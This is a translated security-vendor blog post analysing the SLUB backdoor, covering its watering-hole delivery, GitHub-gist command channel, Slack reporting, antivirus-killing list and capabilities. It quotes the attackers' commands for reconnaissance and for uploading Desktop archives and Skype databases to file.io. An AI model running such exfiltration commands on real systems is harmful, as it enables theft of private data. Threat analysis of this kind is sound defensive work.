<p><strong>New SLUB backdoor uses GitHub and communicates via Slack</strong></p>

<p>Published 2019-03-25 on the Trend Micro Taiwan blog (<a href="https://blog.trendmicro.com.tw/?p=59923">https://blog.trendmicro.com.tw/?p=59923</a>). Translated from the Traditional Chinese original.</p>

<p>Trend Micro recently came across a previously unknown piece of malware that surprised us in several respects. First, we found that it is distributed through a <a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/137/watering-hole-101">watering hole attack</a>. To use this distribution technique, the attackers must first compromise a website and then insert code into its pages that redirects visitors to a page used to infect their computers. In this case, each visitor is redirected only once, and the infection exploits <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-8174">CVE-2018-8174</a>, a vulnerability in the VBScript engine. That vulnerability, however, was already <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patch-tuesday-for-may-includes-updates-for-actively-exploited-vulnerabilities-2/">patched by Microsoft in May 2018</a>.</p>

<div class="wp-block-image"><figure class="alignleft"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2016/08/rootkit-feature-200x200.png" alt="New SLUB backdoor uses GitHub and communicates via Slack"/></figure></div>

<p>Second, the malware uses a multi-stage infection technique. After exploiting the vulnerability above, it downloads a DLL (dynamic link library) file and executes it with PowerShell (PS). That file is itself a downloader: it downloads and runs a second executable, a backdoor. The first-stage downloader also checks whether certain antivirus products are running on the user's computer and, if so, terminates their processes. At the time we discovered this malware, no antivirus vendor appeared to recognise it.</p>

<p>Beyond that, we quickly noticed that the malware connects to Slack, a collaboration messaging platform on which users create their own workspaces organised into channels, somewhat like an IRC chat system. This is noteworthy because, to date, we had not seen malware use Slack for its communications.</p>

<p>Based on Trend Micro's technical analysis of the attackers' tools, techniques and procedures, we believe this threat is part of a covert targeted attack carried out by fairly skilled attackers, rather than ordinary cybercrime.</p>

<p>As soon as Trend Micro discovered the malware, we notified the Canadian Centre for Cyber Security, which is Canada's National Computer Security Incident Response Team (CSIRT). The Centre in turn notified the compromised website, helped its operators understand the malware that was found, and provided remediation advice.</p>

<p><strong><em>The complete infection chain</em></strong></p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-1.jpg" alt="Figure 1. The infection chain of the attack"/></figure>

<p><em>Figure 1: Diagram of the attack's infection chain.</em></p>

<p><strong><em>The malicious downloader</em></strong></p>

<p>The malicious downloader in this attack is a DLL file executed via PowerShell, and it has several functions. First, it downloads and executes the second-stage backdoor, which we named "SLUB" (from SLack and githUB; detection name: <strong>Backdoor.Win32.SLUB.A</strong>). Second, it checks whether any of the following antivirus processes are running on the computer:</p>

<ul><li>V3Tray.exe</li><li>AYAgent.aye</li><li>navapsvc.exe</li><li>ashServ.exe</li><li>avgemc.exe</li><li>bdagent.exe</li><li>ZhuDongFangYu.exe</li></ul>

<p>If any is found, the downloader terminates the process.</p>

<p>Finally, the downloader exploits CVE-2015-1701 to elevate privileges. The exploit code was most likely taken from a <a href="https://github.com/hfiref0x/CVE-2015-1701/blob/master/Source/Taihou/main.c">GitHub repository</a> (shown below) and then modified.</p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-2.jpg" alt="Figure 2. The unmodified code"/></figure>

<p><em>Figure 2: The code before modification.</em></p>

<p><em><strong>The SLUB backdoor</strong></em></p>

<p>SLUB is a custom backdoor written in C++. It uses a statically linked curl library to perform its HTTP requests, plus two other statically linked libraries: boost (used to extract commands from the gist snippet) and JsonCpp (used to parse the Slack channel communications).</p>

<p>The malware also embeds two authorization tokens that it uses to communicate with the Slack API.</p>

<ul><li>It copies itself to "ProgramData\update\" and then persists on the system through the "Run" registry key, using rundll32.exe to call its "UpdateMPUnits" export function. Note that the "ValueName" of that key, "Microsoft Setup Initializazion", contains a spelling error (the correct spelling would be "Initialization").</li></ul>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-3.jpg" alt="Figure 3. Screenshots of the Run registry key"/></figure>

<p><em>Figure 3: Contents written to the "Run" registry key.</em></p>

<ul><li>It downloads a gist snippet from Github, parses the commands it contains and executes them (described in more detail below). Only commands that begin with the "^" character and end with the "$" character are executed; any other data is ignored.</li></ul>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-4-1.jpg" alt="Figure 4. The “gist” snippet that is downloaded from Github"/></figure>

<p><em>Figure 4: The gist snippet downloaded from Github.</em></p>

<p>The output of the executed commands is sent, using the embedded tokens mentioned above, to a private channel in a Slack workspace.</p>

<p>Note that this design has a drawback for the attackers: they cannot issue commands to a specific target, because every infected computer executes the commands in the gist snippet.</p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-5-1.jpg" alt="Figure 5. Scheme of the backdoor communication, with the first arrow starting from the person who initiates the connection"/></figure>

<p><em>Figure 5: The backdoor's communication scheme; communication must be initiated by the attacker.</em></p>

<p><strong><em>Backdoor capabilities</em></strong></p>

<p>The backdoor supports the following commands and subcommands (most are self-explanatory). Command parameters are separated by commas "," (as shown in Figure 4 above):</p>

<table class="wp-block-table table table-hover"><thead><tr><th>Command</th><th>Details</th></tr></thead><tbody>
<tr><td><em>exec</em></td><td>Executes a command using cmd.exe.</td></tr>
<tr><td><em>dnexec</em></td><td>Downloads and executes a command.</td></tr>
<tr><td><em>update</em></td><td>Downloads a file, removes the current version, then executes the downloaded file.</td></tr>
<tr><td><em>destroy</em></td><td>Deletes the malware from disk using a batch script.</td></tr>
<tr><td><em>capture</em></td><td>Takes a screenshot and sends it to the Slack channel.</td></tr>
<tr><td colspan="2"><strong>file</strong></td></tr>
<tr><td><em>list</em></td><td>Lists a file.</td></tr>
<tr><td><em>copy</em></td><td>Copies a file.</td></tr>
<tr><td><em>delete</em></td><td>Deletes a file.</td></tr>
<tr><td><em>upload</em></td><td>Uploads a local file to the file.io site and posts the download link to the Slack channel.</td></tr>
<tr><td colspan="2"><strong>dir</strong></td></tr>
<tr><td><em>create</em></td><td>Creates a directory.</td></tr>
<tr><td><em>remove</em></td><td>Removes a directory.</td></tr>
<tr><td colspan="2"><strong>proc</strong></td></tr>
<tr><td><em>list</em></td><td>Lists processes.</td></tr>
<tr><td><em>kill</em></td><td>Terminates a process.</td></tr>
<tr><td colspan="2"><strong>drive</strong></td></tr>
<tr><td><em>list</em></td><td>Retrieves information about each volume on the current disk, such as free space, detailed attributes, whether the USN journal is enabled, encryption status and so on.</td></tr>
<tr><td colspan="2"><strong>reg</strong></td></tr>
<tr><td><em>Query</em></td><td>Queries the registry.</td></tr>
<tr><td><em>Read</em></td><td>Reads the registry.</td></tr>
<tr><td><em>Write</em></td><td>Writes to the registry.</td></tr>
<tr><td><em>tmout</em></td><td>Calls the "sleep" function.</td></tr>
</tbody></table>

<p><strong><em>Slack communication functions</em></strong></p>

<p>The Slack communication functions contain two hard-coded authentication tokens, each split into several pieces.</p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-6-1.jpg" alt="Figure 6. Code of the communication function"/></figure>

<p><em>Figure 6: Code of the communication function.</em></p>

<p>The backdoor then obtains the user name and computer name (Figure 7), creates a Slack channel and posts messages to it. It sends messages through the following API:</p>

<ul><li>https://api.slack.com/methods/chat.postMessage</li></ul>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-7.jpg" alt="Figure 7. Retrieving the username and computer name"/></figure>

<p><em>Figure 7: Retrieving the user name and computer name.</em></p>

<p>The keywords "title", "text", "channel" and "attachments" are clearly visible in the relevant function.</p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-8.jpg" alt="Figure 8. Function listing showing keywords"/></figure>

<p><em>Figure 8: Keywords visible in the function listing.</em></p>

<p>The output of each executed command is sent to one private Slack channel, while the commands themselves are sent through another private Slack channel as an attachment, with the following text: <em>*computername:username*</em>.</p>

<p><strong><em>The attackers' tools, techniques and procedures</em></strong></p>

<p>The Github account and the Slack workspace used in this attack were both created on 19 and 20 February specifically for this campaign. As for the malware the attackers used, we estimate it was compiled on 22 February.</p>

<p>The attackers added the first batch of commands to Github on 20 February. Looking at the Slack channel, however, we can see that they tested the malware on 23 and 24 February. The first victims began to appear on 27 February.</p>

<p>The attackers' first step was to gather more information from the infected computers in order to learn more about the victims:</p>

<p>^exec,tasklist$</p>

<p>^capture$</p>

<p>^drive,list$</p>

<p>^file,list,C:\Users\$</p>

<p>^reg,read,HKEY_CURRENT_USER,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run$</p>

<p>They look at the running processes, take a screenshot, list all drives and users, and set up a registry entry to keep the malware persistent.</p>

<p>They also list the files in a few common directories:</p>

<p>^exec,dir /s C:\Users\USER\Desktop\$\</p>

<p>^exec,dir /s C:\Users\USER\Downloads\$\</p>

<p>^exec,dir /s C:\Users\USER\Recent\$</p>

<p>Some commands are particularly interesting, for example one that lets the attackers turn the user's entire "Desktop" folder into a single archive, as shown below:</p>

<p>^exec,powershell -Command compress-archive -path C:\Users\USER\Desktop -destinationpath C:\Users\USER\doc1$\</p>

<p>^file,upload,C:\Users\USER\doc1$</p>

<p>The following command builds a CAB file containing the list of all files and directories under the user's "Desktop" folder:</p>

<p>^exec,cd C:\Users\USER &amp; dir /s /b /a-d C:\Users\USER\Desktop &gt; C:\Users\USER\win12 &amp; makecab /d CabinetName1=win34 /f C:\Users\USER\win12$</p>

<p>The attackers also appear to be interested in Skype's local database:</p>

<p>^file,upload C:\Users\Admin\AppData\Roaming\Skype\DataRv\offline-storage-ecs.data$</p>

<p>^file,upload C:\Users\Admin\AppData\Roaming\Skype\DataRv\offline-storage.data$</p>

<p>^file,upload C:\Users\Admin\AppData\Roaming\Skype\DataRv\offline-storage.data-shm$</p>

<p>^file,upload C:\Users\Admin\AppData\Roaming\Skype\DataRv\offline-storage.data-wal$</p>

<p>The attackers copy all .HWP files (an extension used by a Korean word processor) into a directory:</p>

<p>^exec,copy C:\Users\USER\Desktop\*.hwp C:\Users\USER\oo$</p>

<p>They most likely intended to exfiltrate this directory, but we did not see a corresponding command.</p>

<p>We also took particular note of a piece of software named "Neologic Plus Board", which appears to be an administration program for a bulletin board system (BBS). Some of the files the attackers collected contained hundreds of BBS URLs. We also found that most of the files uploaded to file.io had already been deleted by the time we tried to retrieve them.</p>

<p>From the commands the attackers executed, we infer that they were looking for information about people: they wanted to learn more about the victims' everyday communications. So, in addition to collecting .HWP files, they tried to dig up information related to Twitter, Skype, KakaoTalk, BBS systems (and possibly other messaging software).</p>

<p>The following timeline shows how quickly the attackers moved:</p>

<figure class="wp-block-image"><img src="https://blog.trendmicro.com/trendlabs-security-intelligence/files/2019/03/SLUB-Figure-9.jpg" alt="Figure 9. Timeline of events"/></figure>

<p><em>Figure 9: Timeline of the attack.</em></p>

<p><strong><em>Conclusion</em></strong></p>

<p>Perhaps the most intriguing aspect of this campaign is that the attackers used three different communication platforms, one each for sending commands, receiving results and collecting files.</p>

<p>We are fairly confident that this is part of a targeted attack. So far we have found no related attacks, nor have we seen this custom backdoor anywhere else. We also searched for similar malware samples and have found none to date, which most likely means the malware was developed by the attackers themselves, or was supplied privately by other hackers and never circulated publicly.</p>

<p>The commands the attackers executed show a strong interest in personal communications, especially messaging software, presumably in order to learn more about the victims.</p>

<p>The attackers' methods also suggest they are professionals. Because they used only public communication services, they had no need to register any domain or anything else that might leave a trace. The few e-mail addresses we found during the investigation all used disposable e-mail services, which likewise leave no trace. Finally, the website the attackers chose for the watering hole attack appeals to people interested in politics, which may give us a rough idea of the group they wanted to target.</p>

<p>We would especially like to thank Github's SIRT and Slack's security team for quickly removing the related files, which effectively cut off communication between the attackers and their malware.</p>

<p>Slack also issued the following response regarding this incident:</p>

<p><em>As noted by Trend Micro in their post, they recently discovered that someone had used malware to compromise other people's computers, and notified us that a Slack workspace was involved. We immediately investigated and shut down the workspace, which violated our Terms of Service, and confirmed that Slack itself was not compromised in any way in this incident. We have always worked to prevent abuse of our platform, and we will take action against any violation of our </em><a href="https://slack.com/terms-of-service"><em>Terms of Service</em></a><em>.</em></p>

<p><strong><em>Indicators of Compromise (IoC):</em></strong></p>

<ul><li>3ba00114d0ae766cf77edcdcc953ec6ee7527181968c02d4ffc36b9f89c4ebc7 (Trojan.Win32.CVE20151701.E)</li><li>43221eb160733ea694b4fdda70e7eab4a86d59c5f9749fd2f9b71783e5da6dd7 (Backdoor.Win32.SLUB.A)</li></ul>

<p><strong><em>URL:</em></strong></p>

<ul><li>hxxps://gist.github[.]com/kancc14522/626a3a68a2cc2a91c1ece1eed7610c8a</li></ul>

<p>Original article: <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/">New SLUB Backdoor Uses GitHub, Communicates via Slack</a>, by Cedric Pernet, Daniel Lunghi, Jaromir Horejsi and Joseph C. Chen.</p>